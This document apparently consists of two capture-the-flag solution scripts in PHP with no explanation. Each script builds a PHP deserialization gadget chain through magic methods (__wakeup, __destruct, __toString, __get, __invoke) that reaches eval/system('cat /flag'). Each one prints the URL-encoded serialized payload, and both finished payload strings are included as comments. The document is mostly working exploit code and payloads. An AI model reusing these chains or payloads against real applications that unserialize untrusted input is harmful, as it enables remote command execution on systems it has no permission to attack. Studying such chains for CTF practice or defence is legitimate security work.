<?php class re{ public $chu0; public function __toString(){ if(!isset($this->chu0)){ return "I can not believes!"; } $this->chu0->$nonono; } }
class web { public $kw; public $dt;
public function __wakeup() { echo "lalalla".$this->kw; }
public function __destruct() { echo "ALL Done!"; } }
class pwn { public $dusk; public $over;
public function __get($name) { if($this->dusk != "gods"){ echo "什么,你竟敢不认可?"; } $this->over->getflag(); } }
class Misc { public $nothing; public $flag;
public function getflag() { eval("system('cat /flag');"); } }
class Crypto { public function __wakeup() { echo "happy happy happy!"; }
public function getflag() { echo "you are over!"; } } $a = new web(); $a->kw = new re(); $a->kw->chu0 = new pwn(); $a->kw->chu0->dusk = "gods"; $a->kw->chu0->over = new Misc(); echo urlencode(serialize($a)); ?> //O%3A3%3A%22web%22%3A2%3A%7Bs%3A2%3A%22kw%22%3BO%3A2%3A%22re%22%3A1%3A%7Bs%3A4%3A%22chu0%22%3BO%3A3%3A%22pwn%22%3A2%3A%7Bs%3A4%3A%22dusk%22%3Bs%3A4%3A%22gods%22%3Bs%3A4%3A%22over%22%3BO%3A4%3A%22Misc%22%3A2%3A%7Bs%3A7%3A%22nothing%22%3BN%3Bs%3A4%3A%22flag%22%3BN%3B%7D%7D%7Ds%3A2%3A%22dt%22%3BN%3B%7DALL Done!
<?php class Sink { private $cmd = 'system("cat /flag");'; public function __toString() { eval($this->cmd); } } class Shark { private $word = 'Hello, World!'; public function setWord($word) { $this->word = $word; } public function __invoke() { echo 'Shark says:' . $this->word; } } class Sea { public $animal; public function __get($name) { $sea_ani = $this->animal; echo 'In a deep deep sea, there is a ' . $sea_ani(); } } class Nature { public $sea;
public function __destruct() { echo $this->sea->see; } } $a = new Nature(); $a->sea = new Sea(); $b = new Sink(); $c = new Shark(); $c->setWord($b); $a->sea->animal =$c; echo urlencode(serialize($a)); ?> //O%3A6%3A%22Nature%22%3A1%3A%7Bs%3A3%3A%22sea%22%3BO%3A3%3A%22Sea%22%3A1%3A%7Bs%3A6%3A%22animal%22%3BO%3A5%3A%22Shark%22%3A1%3A%7Bs%3A11%3A%22%00Shark%00word%22%3BO%3A4%3A%22Sink%22%3A1%3A%7Bs%3A9%3A%22%00Sink%00cmd%22%3Bs%3A20%3A%22system%28%22cat+%2Fflag%22%29%3B%22%3B%7D%7D%7D%7D